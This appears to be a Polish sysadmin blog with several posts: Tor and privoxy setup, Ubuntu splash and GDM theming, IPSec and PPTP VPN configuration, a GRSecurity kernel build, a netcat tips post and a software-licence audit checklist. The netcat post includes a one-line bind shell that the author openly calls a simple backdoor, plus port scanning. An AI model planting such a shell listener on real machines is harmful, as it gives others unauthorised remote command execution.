Koniec neutralności sieci w Polsce? NIE! Jest w końcu TOR!

Jeżeli wierzyć doniesieniom prasowym to wkrótce będziemy mieli w Polsce drugie Chiny. Rząd Donalda Tuska chce, wzorem Chin, Iranu i Australii, zmusić dostawców Internetu do blokowania wybranych adresów www. Adresy mają być wskazywane przez UKE, policja, służby specjalne i Ministerstwo Finansów. Czyli cenzura internetu stanie się faktem. Kto wie może niedługo gg i poczta znajdą się na celowniku inteligentnych inaczej z rządu. Za nim do tego dojdzie chciałem pokazać prosty sposób jak poradzić sobie z tego typu sankcjami. Wszystko pięknie i anonimowo będzie działało jednak niesmak zostaje po tym jak przypomnę sobie na kogo głosowałem…

Tor, bo o nim będzie mowa, jest programem działającym w otwartej sieci, która pomaga chronić użytkowników przed inwigilacją, zagrażającej anonimowości i prywatności w sieci.
Tor chroni cię, przekazując twoją komunikację poprzez rozproszoną sieć przekaźników sieciowych uruchamianych przez wolontariuszy na całym świecie: zapobiega to odkrywaniu, jakie strony odwiedzasz poprzez podsłuchiwanie twojego połączenia internetowego i zapobiega to odkrywaniu twojego miejsca pobytu przez strony, które odwiedzasz. Tor działa z wieloma już istniejącymi aplikacjami, łącznie z przeglądarkami internetowymi, komunikatorami, zdalnym logowaniem i innymi, opartymi na protokole TCP.

Instalacja :
Edytujemy naszą source.liste :
pico /etc/apt/sources.list
Dodajemy dwa wpisy :
deb http://mirror.noreply.org/pub/tor jaunty main
deb-src http://mirror.noreply.org/pub/tor jaunty main

Aktualizujemy nasze repozytoria i instalujemy TORa i privoxy :
# apt-get update
# apt-get install tor privoxy

Jeżeli podczas instalacji pokaże nam się taki komunikat, to będziemy musieli ściągnąć jedną paczkę
Następujące pakiety mają niespełnione zależności:
tor: Wymaga: libevent1 (>= 1.3e) ale nie da się go zainstalować
E: Pakiety są uszkodzone

ściągamy ją :
# wget http://fr.archive.ubuntu.com/ubuntu/pool/main/libe/libevent/libevent1_1.3e-3_i386.deb
# dpkg -i libevent1_1.3e-3_i386.deb

i wracamy do naszej instalacji :
# apt-get install tor privoxy

Edytujemy plik konfiguracyjny privoxy :
# pico /etc/privoxy/config
Dodajmy ten wpis ( obojętnie gdzie ) :
forward-socks4a / 127.0.0.1:9050 .
kropka na końcu jest ważna !
I haszujemy tą linijkę :
logfile logfile
( #logfile logfile )
w pico szuka się po wciśnięciu CRTL+W

Restartujemy privoxy :
# /etc/init.d/./privoxy restart

Na koniec zostaje nam już tylko pobrać dodatek do FireFoxa. Torbutton daje użytkownikowi przycisk do szybkiego i bezpiecznego włączania i wyłączania korzystania z Tora przez przeglądarkę. Od wersji 1.1 Torbutton dostarcza mechanizmy zaawansowanej prywatności i izolacji stanu przeglądarki, które czynią ją bardziej prywatną i bezpieczną w używaniu Tora niż jakiekolwiek inne rozszerzenie do zmiany proxy.
https://addons.mozilla.org/pl/firefox/addon/2275

Przy wyłączonej wtyczce Torbutton :

Oraz po jej włączeniu :

Linki:
http://osnews.pl/koniec-neutralnosci-sieci-w-polsce/
http://www.torproject.org/index.html.pl
http://wiki.noreply.org/noreply/TheOnionRouter/TorifyHOWTO

Tworzymy własny motyw XSplash

Odwołując się do poprzedniego wpisu postanowiłem znaleźć sposób na stworzenie własnego motywu dla XSplasha. Okazało się to dosyć proste a rezultat jaki udało mi się osiągnąć wygląda tak :

Tło ekranu logowania GDM automatycznie samo się zmienił więc wszystko ze sobą gra i nie ma nic do zarzucenia od strony estetycznej :

Wszystkie pliki odpowiedzialne za wygląd XSplasha znajdują się w /usr/share/images/xsplash
Są to między innymi pliki tła bg_rozdzielczość.pg które musimy podmienić zachowując odpowiednią rozdzielczość :
bg_1024x768.jpg
bg_1280x1024.jpg
bg_1440x900.jpg
bg_1680x1050.jpg
bg_1920x1200.jpg
Oraz pliki z logiem i samym paskiem postępu które możemy edytować/podmieniać wedle własnego uznania :
logo_xtra_large.png
throbber_large.png
logo_large.png throbber_medium.png
logo_medium.png throbber_small.png
logo_small.png throbber_xtra_large.png

Paczka z moim XSplashem http://dl.getdropbox.com/u/1207653/wordpress/xsplash.rar . Należy całą jej zawartość rozpakować do /usr/share/images/xsplash zastępując istniejące tam pliki jeżeli zależy nam na takim samym efekcie jaki mi udało się osiągnąć. Tła znajdujące się w paczce można wykorzystać jako tło dla pulpitu będące doskonałym dopełnieniem do motywu XSplasha.

Teraz zmiana wyglądu GDMa którą opisałem tutaj ma nawet sens ;]

Zamiana XSplash na USplash w Ubuntu 9.10

Nowe wydanie Ubuntu zawiodło chyba sporą część społeczności. GDM i XSplash w oficjalnej wersji 9.10 bez możliwości dostosowania ich wyglądu to jakieś nieporozumienie. Zmuszeni jesteśmy do używania sztuczek żeby zmienić wygląd GDMa ale wiąże się to z pewnymi estetycznymi niedogodnościami. W aktualnej wersji GDM i XSplash stanowią tak jakby jedność, brązowy motyw jest w jednym i drugim produkcie a zmiana ustawień GDMa sprawia, że nic ze sobą nie gra.. Dlatego postanowiłem pokazać jak dostosować wygląd tych elementów do swoich potrzeb, będzie się to wiązało z zastąpieniem XSplasha USplashem z wersji Ubuntu 9.04.

Wywalamy XSplash’a i instalujemy USplash’a :
# sudo -i
# apt-get update
# apt-get remove xsplash ubuntu-xsplash-artwork
# apt-get install usplash-theme-ubuntu-color
# apt-get remove usplash-theme-ubuntu
i w tym momencie posiadamy zainstalowany motyw Splasha z wersji 9.04. Po zrestartowaniu komputera będzie on już dostępny.

Po instalacji paczki usplash-theme-debian będzie pojawiał się sam tekst zamiast grafiki i pasków postępu.

Zarządzanie motywami USplash’a :
Parę motywów USplasha możemy znaleźć w repozytoriach, np szukając przy pomocy aptsh. Innym sposobem jest zainstalowanie startupmanager’a
# apt-get install startupmanager

i z jego poziomu zmieniać motywy. Sporo ciekawych motywów można znaleźć tutaj http://gnome-look.org/index.php?xcontentmode=160

Edycja GDM’a :
Odpalamy konsolę i wpisujemy
$ gksudo -u gdm dbus-launch gnome-appearance-properties
Po podaniu hasła pokaże nam się okno edycji ustawień wyglądu identyczne jak to w którym możemy zmieniać ustawienia wyglądu okien i zmieniać tapety :

Po wykonaniu tej komendy za każdym razem gdy uruchomimy Ubuntu pojawia się niebieska ikonka dostępu uniwersalnego. Jeżeli chcemy to wyłączyć to musimy wejść do ustawień Technologi wspierających :
System --> Preferencje --> Technologie wspierające --> Dostępność klawiatury --> i odznaczamy opcję "przełączanie funkcji dostępności przy użyciu skrótów klawiszowych"

Wyłączamy listę użytkowników pokazywaną w GDMie :
sudo -u gdm gconftool-2 --set --type boolean /apps/gdm/simple-greeter/disable_user_list true

A tak włączmy z powrotem:
sudo -u gdm gconftool-2 --set --type boolean /apps/gdm/simple-greeter/disable_user_list false

Efekt końcowy :

Szyfrowanie ruchu w sieci LAN z IPSec

Częstym problemem występującym w sieciach LAN jest brak szyfrowania ruchu lub zbyt słabe zabezpieczenia dostępne w tanich urządzeniach takich jak np routery. Jednym ze sposobów poradzenia sobie z tym jest zastosowanie sieci VPN którą opisałem w poprzednim wpisie lub wprowadzenie szyfrowania całego ruchu w oparciu o dostępny w Windowsie protokół IPSec. IPsec to zbiór protokołów służących implementacji bezpiecznych połączeń oraz wymiany kluczy szyfrowania pomiędzy komputerami. Protokoły tej grupy mogą być również wykorzystywane do tworzenia Wirtualnej Sieci Prywatnej (ang. VPN). IPsec składa się z dwóch kanałów komunikacyjnych pomiędzy połączonymi komputerami: kanał wymiany kluczy za pośrednictwem którego przekazywane są dane związane z uwierzytelnianiem oraz szyfrowaniem (klucze) oraz kanału (jednego lub więcej), który niesie pakiety transmitowane poprzez sieć prywatną. Kanał wymiany kluczy jest standardowym protokołem UDP (port 500). Kanały przesyłu danych oparte są na protokole ESP (protokół numer 50) opisanym w dokumencie RFC 2406. Więcej do poczytania na wikipedii http://pl.wikipedia.org/wiki/IPsec .

W tym wpisie pokażę jak zainstalować i skonfigurować połączenie oparte o IPSec pomiędzy Windowsem XP i Linuksem Ubuntu 9.04.

Instalacja Ubuntu :
# apt-get update
# apt-get install isakmpd

Jeżeli wszystko pójdzie dobrze to powinniśmy zobaczyć
Konfigurowanie isakmpd (20041012-5) ...
Starting OpenBSD isakmpd: done

Przechodzimy do konfiguracji isakmpd:
# cp /etc/isakmpd/isakmpd.conf /etc/isakmpd/isakmpd.conf.kopia
# echo > /etc/isakmpd/isakmpd.conf
# pico /etc/isakmpd/isakmpd.conf
Do pliku isakmpd.conf wklejamy :
[Phase 1]
Default= any

[any]
Phase= 1
Configuration= Default-main-mode
Authentication= TAJNE-HASLO

[Default-main-mode]
EXCHANGE_TYPE= ID_PROT
Transforms= AES-SHA,3DES-SHA

Następnie :
# cp /etc/isakmpd/isakmpd.policy /etc/isakmpd/isakmpd.policy.kopia
# echo > /etc/isakmpd/isakmpd.policy
# pico /etc/isakmpd/isakmpd.policy
i wklejamy :
KeyNote-Version: 2
Comment: This policy accepts ESP SAs from a remote that uses the right password
$OpenBSD: policy,v 1.6 2001/06/20 16:36:19 angelos Exp $
$EOM: policy,v 1.6 2000/10/09 22:08:30 angelos Exp $
Authorizer: "POLICY"
Licensees: "passphrase:TAJNE-HASLO"
Conditions: app_domain == "IPsec policy" &&
esp_present == "yes" &&
esp_enc_alg != "null" -> "true";

Na koniec restartujemy tunel :
# /etc/init.d/isakmpd restart

Konfiguracja Windowsa XP :
1. Start > uruchom > mmc
2. Gdy odpali się konsola mmc przechodzimy menu Plik > Dodaj/Usuń przystawkę.. > w zakładce Autonomiczna klikamy na Dodaj > na samym dole listy wybieramy Zarządzanie zasadami zabezpieczeń IP > Komputer lokalny
3. Prawy klik w miejscu gdzie są Zasady > Utwórz zasadę zabezpieczeń IP > nazwa IPSec
4. Dalej > Dalej > W miejscu gdzie jest możliwość wyboru metody autoryzacji wybieramy : Użyj tego ciągu do ochrony wymiany kluczy i wpisujemy tam nasze TAJNE-HASLO > dalej > edytuj właściwości
5. Dodaj > Ta reguła nie określa żadnego tunelu > Sieć LAN > Użyj tego ciągu do ochrony wymiany kluczy i wpisujemy tam nasze TAJNE-HASLO > dalej > w miejscu Listy filtrów IP dajemy DODAJ > DODAJ > Dalej > Mój adres IP > Dowolny adres IP > Dowolny > Zakończ > OK > na koniec zaznaczamy naszą regułę klikając na nią > dalej > zaznaczamy Wymagaj Zabezpieczeń > Zakończ > OK > Zakończ >
6. Na liście zasad klikamy na naszą zasadę IPSec prawym przyciskiem i wybieramy Przypisz

Przykład ruchu przed ustawieniem szyfrowania i po :
Przed ( ping na wp.pl z komputera 192.168.0.104 ) :
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
15:24:18.810670 IP 192.168.0.104 > www.wp.pl: ICMP echo request, id 512, seq 3328, length 40
15:24:18.810685 IP 192.168.0.104 > www.wp.pl: ICMP echo request, id 512, seq 3328, length 40
15:24:18.833136 IP www.wp.pl > 192.168.0.104: ICMP echo reply, id 512, seq 3328, length 40


Po ( ping na 192.168.0.103 z tego samego komputera ) :
15:43:55.230110 IP 192.168.0.104.500 > 192.168.0.103.500: isakmp: phase 1 I ident
15:43:55.231793 IP 192.168.0.103.500 > 192.168.0.104.500: isakmp: phase 1 R ident
15:43:55.261015 IP 192.168.0.104.500 > 192.168.0.103.500: isakmp: phase 1 I ident
15:43:55.293697 IP 192.168.0.103.500 > 192.168.0.104.500: isakmp: phase 1 R ident
15:43:55.304717 IP 192.168.0.104.500 > 192.168.0.103.500: isakmp: phase 1 I ident[E]
15:43:55.311441 IP 192.168.0.103.500 > 192.168.0.104.500: isakmp: phase 1 R ident[E]
15:43:55.320323 IP 192.168.0.104.500 > 192.168.0.103.500: isakmp: phase 2/others I oakley-quick[E]
15:43:55.321473 IP 192.168.0.103.500 > 192.168.0.104.500: isakmp: phase 2/others R oakley-quick[E]
15:43:55.329405 IP 192.168.0.104 > 192.168.0.103: ESP(spi=0x54ec7b59,seq=0x1), length 76
15:43:55.329431 IP 192.168.0.104.500 > 192.168.0.103.500: isakmp: phase 2/others I oakley-quick[E]
15:43:55.334433 IP 192.168.0.103 > 192.168.0.104: ICMP 192.168.0.103 protocol 50 unreachable, length 104
15:43:56.156008 IP 192.168.0.104 > 192.168.0.103: ESP(spi=0x54ec7b59,seq=0x2), length 76
15:43:56.162215 IP 192.168.0.103 > 192.168.0.104: ESP(spi=0x72c430f4,seq=0x1), length 76
15:43:57.155322 IP 192.168.0.104 > 192.168.0.103: ESP(spi=0x54ec7b59,seq=0x3), length 76
15:43:57.158452 IP 192.168.0.103 > 192.168.0.104: ESP(spi=0x72c430f4,seq=0x2), length 76

Prosty VPN na przykładzie PPTP

Jeżeli zależy nam na bezpieczeństwie komunikacji w firmie lub poza jej obrębem to powinniśmy zainteresować się wdrożeniem sieci VPN. Wirtualne sieci prywatne zapewniają szyfrowany transfer danych przesyłanych przez Internet. Rozwiązanie to umożliwia budowę bezpiecznej formy komunikacji zarówno w obrębie przedsiębiorstwa, jak i dla celów prywatnych. W tym wpisie postaram się pokazać jak skonfigurować i zestawić takie bezpieczne połączenie przy pomocy PPTP. PPTP (Point-to-Point Tunneling Protocol) – wspólne dzieło Microsoftu i US Robotics, został zaprojektowany do łączenia VPN. PPTP jest rozszerzeniem PPP (Point-to-Point Protocol), standardowego protokołu komunikacyjnego Internetu, gwarantującego niezawodność asynchronicznej transmisji łączem szeregowym punkt-punkt bez ograniczania przepływności. Jest on szeroko stosowany do łączenia i przesyłania informacji zarówno w publicznym Internecie, jak i prywatnej sieci korporacyjnej. Ponieważ PPP funkcjonuje w warstwie drugiej, to połączenie PPTP, umożliwiające kapsułkowanie pakietów PPP, pozwala użytkownikom wysyłać nie tylko pakiety IP, ale także IPX i NetBEUI (NetBIOS Extended User Interface). Typowym klientem PPTP jest komputer z zainstalowanym systemem operacyjnym Microsoftu. W Windows zdefiniowanym protokołem szyfrującym jest MPPE (Microsoft Point to Point Encryption). Jest oparty na standardowym systemie kryptograficznym RSA (Rivest, Shamir, Adleman), który obsługuje 40-bitowe lub 128-bitowe szyfrowanie. Chociaż poziom bezpieczeństwa zapewniany przez ten protokół jest wystarczający dla wielu aplikacji, to najczęściej jest postrzegany jako mniej bezpieczny od niektórych algorytmów szyfrowania oferowanych przez IPS, a w szczególności od 168-bitowego Triple DES (Data Encryption Standard).

Instalacja :
# apt-get update
# apt-get install pptpd

Konfiguracja :
1. Dodajemy użytkowników którzy będą mogli łączyć się z naszą siecią. W tym celu edytujemy plik /etc/ppp/chap-secrets
# pico /etc/ppp/chap-secrets

Plik ten ma bardzo prostą budowę. Musimy w nim podać nazwę usera jaką będzie używał do logowania się, server któremu będzie podlegać ten user, jego hasło i adres IP jaki ma dostać przy zalogowaniu się. W miejscu IP możemy wstawić * , wtedy adres będzie przydzielany z puli adresów które ustalimy w configu PPTP
# Secrets for authentication using CHAP
# client server secret IP addresses
user pptpd tajne-haslo 192.168.0.250
user2 pptpd tajne haslo 192.168.0.251

2. Konfigurujemy PPTP
W tym celi edytujemy plik /etc/pptpd.conf
# pico /etc/pptpd.conf
Na samym końcu pliku odnajdujemy wpis :
localip 192.168.0.103 # adres serwera PPTP
remoteip 192.168.0.234-238 # pula adresów do wykorzystania dla podłączających się userów
I dopasowujemy go do siebie.

Na koniec zostaje nam już tylko zrestartować server PPTP
# /etc/init.d/pptpd restart
i już możemy się cieszyć VPNem.

3. Konfiguracja połączenia w Win XP
Panel sterowania > Połączenia sieciowe > Kreator nowego połączenia > Połącz z siecią w miejscu pracy > Połączenie wirtualnej sieci prywatnej > Tutaj wypełniamy odpowiednimi danymi takimi jak nazwa połączenia, adres ip serwera itp

Linki:
http://pigtail.net/nicholas/pptp/
http://onlyubuntu.blogspot.com/2008/09/howto-setup-pptp-server-vpn-on-ubuntu.html
http://www.networld.pl/artykuly/5716_1/Praktyczne.aspekty.wirtualnych.sieci.prywatnych.html
http://www.pcworld.pl/artykuly/21394_0_1/Droga.prywatna.wstep.wzbroniony.html

GIMP 2.8 w jednym oknie

To że GIMP upodabnia się do Photoshopa nie jest tajemnicą, nawet wyglądem zaczyna przypominać swojego konkurenta. W wersji 2.8 jest dostępny tryb jednookienkowy, tzn zamiast kilku małych okienek z podręcznymi narzędziami wszystko jest teraz upchnięte w jedno okno. Wile osób narzekało na brak tego rozwiązania w poprzednich wersjach. 2.8 jest wersją testową więc posiada pewne niedociągnięcia i czasami lepiej działa w starym systemie okienkowym niż jednym oknie ale dla chcących przetestować polecam.

Instalacja polega na dodaniu do /etc/apt/sources.list dwóch linijek :
deb http://ppa.launchpad.net/matthaeus123/mrw-gimp-svn/ubuntu karmic main
deb-src http://ppa.launchpad.net/matthaeus123/mrw-gimp-svn/ubuntu karmic main
a na koniec dodaniu klucza :
sudo apt-key adv --recv-keys --keyserver keyserver.ubuntu.com 405A15CB

Po aktualizacji systemu zyskujemy nowego GIMPa ;] W zakładce Windows możemy zmienić tryb wyświetlania okienek.
Nie są to oficjalne repozytoria PPA jednak dają nam dostęp do codziennych uaktualnień GIMPa.

Microsoft Security Essentials

Piekło chyba zamarzło… pierwszy raz jestem zadowolony z darmowej aplikacji Microsoftu. Microsoft Security Essentials (MSE) (wcześniej znane jako Morro) jest darmowym programem antywirusowym zapewniającym całkiem dobrą ochronę przez wirusami, spyware, rootkitami i trojanami działającym na Windowsie XP, Vista oraz 7. Dodatkowym atutem tego oprogramowania jest proste i intuicyjne menu, niestety narazie nie ma dostępnego języka polskiego ale myślę że konfiguracja i obsługa nie powinna sprawiać problemów osobom nawet słabo znającym język angielski. Po za prostym menu program oferuje trzy tryby skanowania (pełne, skrócone i użytkownika, w którym możemy wybrać dyski, a nawet poszczególne foldery), harmonogram skanowania, automatyczne (lub definiowane przez użytkownika) aktualizacje baz sygnatur, a także historię wykrytych zagrożeń.

Kolejnymi plusami dla MSE jest całkiem dobre wykrywanie zagrożeń czyhających na pendrivach, bardzo małe zapotrzebowanie na zasoby systemu oraz dosyć częste aktualizacje bazy wirusów które zresztą odbywają się automatycznie. Podczas pracy MSE nie zalewa nas zbędnymi alertami o zagrożeniach, działa sobie cicho odzywając się jedynie gdy jest potrzebna nasza ingerencja. To wszystko sprawia, że MSE staje się idealnym antywirusem dla osób mniej wymagających oraz takich które nie korzystają z żadnej ochrony lub chcą przejść na oryginalne oprogramowanie.

Wymagania:
· dla XP – CPU 500 MHz lub lepszy, 256 MB RAM lub więcej
· dla Vista / W7 – CPU 1.0 GHz lub lepszy,1 GB RAM lub więcej
· Rozdzielczość: 800 x 600 lub większa
· Dysk: 140 MB wolnej przestrzeni lub więcej
· Dostęp do internetu
· IE lub Firefox

Pliki do pobrania:
Dla XP
Dla Visty i 7

Linki:
http://en.wikipedia.org/wiki/Microsoft_Security_Essentials
http://arstechnica.com/microsoft/news/2009/09/first-look-microsoft-security-essentials-impresses.ars

Sposoby używania netcat’a

Netcat jest czymś w rodzaju scyzoryka szwajcarskiego – wielofunkcyjnym narzędziem, jego zastosowanie i ilość funkcji jaką będzie oferował jest ograniczona tylko naszą pomysłowością. Zainstalowany jest on domyślnie we wszystkich systemach *niksopodobnych, istnieje też wersja dla Windows, która jest tak samo funkcjonalna jak ta na *niksy.
Postanowiłem zamieścić tutaj parę przydatnych zastosowań :

Skanowanie portów:
netcat -z -v 192.168.0.1 1-100

Wynik tego polecenia to np:
192.168.0.1: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.0.1] 80 (www) open

reverse shell, czyli odpalamy powłokę która pozwoli nam wykonywać zdalnie polecenia:
netcat -l -p 9876 -c /bin/bash
odpalona w ten sposób powłoka ma takie same uprawnienia jak user odpalający to polecenie ( i tak o to stworzyliśmy prostego backdoora ;] )

Polecenie wyżej może być też użyte do pokazywania zawartości katalogów:
netcat -l -p 9876 -c "ls /boot"

wrzucając tam polecenie uptime będziemy mogli uzyskiwać uptime komputera

Prosty serwer www:
while true ; do netcat -l -p 80 -c 'cat index.htm' ; done

Kopiowanie plików między komputerami:
Na komputerze gdzie chcemy wrzucić plik otwieramy port 9876
netcat -l -p 9876 > plik

A na drugim komputerze wrzucamy go na port 9876
netcat localhost 9876 < wazny.plik

Lub metoda z kompresją:
komputer1: netcat -lvp 12345 | tar -xv
komputer2: tar -cv plik | netcat -v adres_IP_komputera1 12345

Sprawdzamy informacje o naszej przeglądarce:
netcat -l -p 9876
Teraz łączymy się przy pomocy naszej przeglądarki z lochalhost:9876 i już wszystko jest jasne ;] :
GET / HTTP/1.1
Host: 192.168.0.2:9876
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; pl; rv:1.9.1.3) Gecko/20091007 Ubuntu/9.10 (karmic) Firefox/3.5.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cache-Control: max-age=0

Wireshark + netcat + tcpdump
http://www.gumularz.net/linux-tips/2009/06/wireshark-netcat-tcpdump/

Ręczna kompilacja kernela pod Ubuntu +instalacja łatki GRSecurity

Dawno temu pisywałem sposób jak łatwo zainstalować kernel z łatką GRSecurity przy pomocy apt-get. Było to rozwiązanie raczej dla leniwych lub mniej doświadczonych i miało pewne wady :
* brak możliwości dostosowania kernela do własnych potrzeb
* repozytoria z których był ściągany kernel nie były oficjalnymi repozytoriami
* rzadko pojawiały się tam najnowsze wersje kerneli
Dlatego teraz postanowiłem opisać sposób samodzielnej instalacji najnowszego jajka z łątką GRSec. Zależnie od mocy obliczeniowych maszyny na której będziemy to robić może to potrwać od pół do nawet kilkunastu godzin jednak da nam to wymierne korzyści. Począwszy na wyeliminowaniu minusów opisanych wyżej a skończywszy na wiedzy jaką zdobędziemy.
Zanim przejdziemy do kompilacji sprawdźmy czy mamy na dysku kilka giga wolnej przestrzeni.

Zaczynamy :
Do poprawnej kompilacji jajka będzie potrzebne nam parę paczek :
# apt-get update
# apt-get install kernel-package libncurses5-dev fakeroot wget bzip2 build-essential bin86 libqt3-headers libqt3-mt-dev

Domyślnie w Ubuntu /bin/sh jest dowiązane do /bin/dash. /bin/dash może powodować problemy podczas kompilacji ze źródeł, dlatego też zamienimy je na /bin/bash. Tak aby /bin/sh wskazywał /bin/bash.
# rm -f /bin/sh
# ln -s /bin/bash /bin/sh

Przechodzimy do katalogu /usr/src i zaczynamy ściąganie źródeł kernela i patch GRSec :
# cd /usr/src/
# wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.31.4.tar.bz2
Inne wersji kerneli i GRSec można pobrać z oficjalnych stron które zamieściłem na końcu wpisu w dziale Linki.

Rozpakowujemy źródła :
# tar -xvjf linux-2.6.31.4.tar.bz2
# cd linux-2.6.31.4
# wget http://www.grsecurity.net/test/grsecurity-2.1.14-2.6.31.4-200910141729.patch

Patchujemy źródła :
# patch -p1 < grsecurity-2.1.14-2.6.31.4-200910141729.patch
Jeżeli nie zależy nam na łatce GRSecurity to możemy pominąć ten krok i przejść dalej.

Kopiujemy configa kernela z aktualnie działającego systemu :
# cp /boot/config-`uname -r` .config

I teraz zaczyna się najciekawsze.. Nie ukrywam, że ten etap jest najtrudniejszy i wymaga sporej wiedzy o systemie od użytkownika lub cierpliwości i chęci szukania informacji o modułach które są dostępne w samym kernelu. Z biegiem czasu kernel się rozrasta, dzięki temu zyskujemy możliwość obsługi dużej ilości sprzętu jednak sytuacja się komplikuje gdy mamy sami wybrać jakie moduły mają być ładowane przy starcie systemu. Pozostawienie domyślnie zaznaczonych prawie wszystkich sprawi że kernel będzie kompilował się godzinami i będzie bardzo “ociężały”. Jest to dobra opcja dla mniej doświadczonych, jednak dla bardziej wtajemniczonych polecam poświęcenie trochę czasu na poszperanie w modułach. Pozwoli to nam dostosować kernel do własnych potrzeb a wyeliminowanie zbędnych modułów dodatkowo zwiększa bezpieczeństwo systemu. Inną sprawą są dodatkowe opcje konfiguracji które pokażą nam się po spaczowaniu źródeł łatką GRSec. Oczywiście można wybrać jeden z trybów bezpieczeństwa (słaby, średni, mocny) lub poczytać tutaj -> http://newbie.linux.pl/wydruk.php?wydruk=108&show=artykul i samemu dostosować GRSec pod siebie. Jednak nawet tryb słaby daje nam większe bezpieczeństwo niż czysty kernel.
Odpalamy menu konfiguracji jajka:
# make menuconfig

Zaczynamy kompilować i tworzyć paczki *.deb naszego kernela :
# make-kpkg clean
# make-kpkg --initrd kernel_image kernel_headers modules_image

Na koniec możemy zabrać się za czyszczenie systemu :
# cd ../
# rm -rf linux-2.6.31.4/


I instalację nowego kernela :
# dpkg -i *.deb

Nowy kernel powinien się nam dodać automatycznie do menu wyboru w grubie. Jeżeli wszystko poszło dobrze to po restarcie komputera powinniśmy zobaczyć coś takiego :

Linki:
http://newbie.linux.pl/wydruk.php?wydruk=108&show=artykul
http://kernel.org/
http://www.grsecurity.net/

Audyt legalności oprogramowania

Audyt lub inaczej kontrola legalności oprogramowania posiadanego w firmie jest bardzo ważną częścią pracy każdego administratora oraz samego procesu audytu informacyjnego. Pozwala kontrolować faktyczny stan zainstalowanego oprogramowania, jego legalność oraz posiadane licencje. W krytycznych sytuacjach pozwala uniknąć dużych nieprzyjemności dla firmy lub samej osoby informatyka, ponieważ POSIADANIE – KOPIOWANIE – KORZYSTANIE z nielegalnego oprogramowania to PRZESTĘPSTWO. Usuwanie, obchodzenie, łamanie zabezpieczeń programów to również PRZESTĘPSTWO. Postępowanie takie jest zagrożone:
- karą pozbawienia wolności od 3 miesięcy do 5 lat (art.278 § 2 K. K)
- karą ograniczenia wolności
- grzywną
- środkami karnymi np. przepadek przedmiotów, naprawienie szkody, świadczenie pieniężne na cel społeczny).

Aby tego uniknąć należy przeprowadzać w miarę możliwość często audyt. Wielu pracowników może nieświadomie instalować nielegalne oprogramowanie lub ściągać muzykę czy filmy na komputery firmowe. Robiąc to mogą kierować się niewiedzą albo chęcią umilenia sobie pracy. Do prawidłowego wykrywania takich nadużyć niezbędne w pracy audytora może się okazać dodatkowe oprogramowanie ale o tym później, teraz chciałbym skupić się na samym przebiegu audytu.Procedura audytu informatycznego jest złożona i może różnić się w zależności od profilu firmy i jej wielkości, jednak w większości wypadków składa się ona z pięciu najważniejszych etapów.

Gromadzenie danych
Zbieranie danych o sprzęcie i oprogramowaniu w firmie polega na skanowaniu komputerów przy wykorzystaniu wyspecjalizowanej aplikacji umożliwiającej gromadzenie szczegółowych danych o zainstalowanych programach na komputerach podłączonych do sieci informatycznej. Po zgromadzeniu informacji nt. posiadanego w firmie oprogramowania porównuje się te informacje z wykupionymi licencjami.

Analiza danych

Aplikacja zbierająca dane o wykorzystywanym oprogramowaniu porównuje jego stan ze stanem zakupionych licencji.

Raportowanie

Po przeprowadzeniu analizy legalności wykorzystywanego oprogramowania tworzone są szczegółowe raporty o stanie licencji, pozwalające na podjęcie decyzji o usunięciu zbędnego oprogramowania z sieci lub o nabyciu odpowiednich licencji.

Kroki zaradcze

Po zgromadzeniu szczegółowej wiedzy nt. braków w licencjach podejmowane są decyzje mające na celu usunięcie problemów i zapewnienie firmie optymalnego poziomu wykorzystania posiadanych licencji, bądź decyzje o zakupie dodatkowych licencji oprogramowania.

Bardziej szczegółowo o audycie, krok po kroku:

1. Inwentaryzacja oprogramowania zainstalowanego (skanowanie komputerów):

1.1. Zbierane informacje o oprogramowania wszystkich producentów, crackach, plikach audio i video.
1.2. Oznaczenie jednostek numerami audytowymi.
1.3. Spisanie i sprawdzenie zgodności certyfikatów autentyczności COA systemów operacyjnych Microsoft.
1.4. Spisanie urządzeń podłączonych do skanowanego komputera (np. drukarka, skaner, itp.).

2. Inwentaryzacja zakupionego oprogramowania:
2.1. Spisanie ilości zakupionego oprogramowania.
2.2. Uporządkowanie i skompletowanie licencji z nośnikami.
2.3. Sporządzenie cyfrowych zdjęć każdej licencji na oprogramowanie (wszystkich producentów).
2.4. Wprowadzenie danych do elektronicznej bazy inwentaryzacji.
2.5. Kontrola antypiracka – sprawdzenie autentyczności licencjonowanych produktów.

3. Analiza danych:
3.1. Weryfikacja zainstalowanego oprogramowania z oprogramowaniem zakupionym.
3.2. Zestawienie braków/nadmiarów oprogramowania i wskazanie najefektywniejszych metod legalizacji.
3.3. Ocena efektywnego wykorzystania systemów komputerowych i wskazanie najefektywniejszych metod zakupów.
3.4. Przygotowanie dokumentacji pod wdrożenie zasad i procedur zarządzania oprogramowaniem.
3.5. Sporządzenie raportów rozliczeniowych.

4. Raport wstępny:
4.1. Opis zakresu przeprowadzonych prac audytowych w firmie.
4.2. Analiza danych zebranych w procesie skanowania i inwentaryzacji oprogramowania.
4.3. Ustalenie wraz z klientem planu naprawczego celem szybkiej i możliwie najtańszej legalizacji.
4.4. Baza danych – nośnik optyczny (CD/DVD) zawierający informacje o prowadzonych działaniach.

5. Wdrożenie zaleceń audytowych:
5.1. Usunięcie niezgodności wykrytych podczas audytu, tj. deinstalacja nielicencjonowanych i zbędnych programów.
5.2. Usuwanie plików multimedialnych, cracków itp.
5.3 Instalacja oprogramowania na życzenie zleceniodawcy z wyłączeniem instalacji systemów operacyjnych, rozwiązań serwerowych, antywirusowych oraz systemów zarządzania firmą.
5.4. Instalacja oprogramowania do zarządzania oprogramowania (opcja).
5.5. Utworzenie metryk komputerowych i przypisanie do nich odpowiednich licencji na zainstalowane oprogramowanie.
5.6. Pomoc we wdrożeniu zasad i procedur zarządzania oprogramowaniem (SAM).

6. Szkolenia i wsparcie merytoryczne
6.1. Szkolenie kadry działu informatycznego z zakresu licencjonowania.
6.2. Szkolenie użytkowników komputerów w zakresie korzystania z oprogramowania i przestrzegania procedur zarządzania oprogramowaniem.
6.3. Szkolenie z obsługi programu do zarządzania oprogramowaniem (opcja).
6.4. Wsparcie merytoryczne z zakresu licencjonowania w okresie obowiązywania umowy.

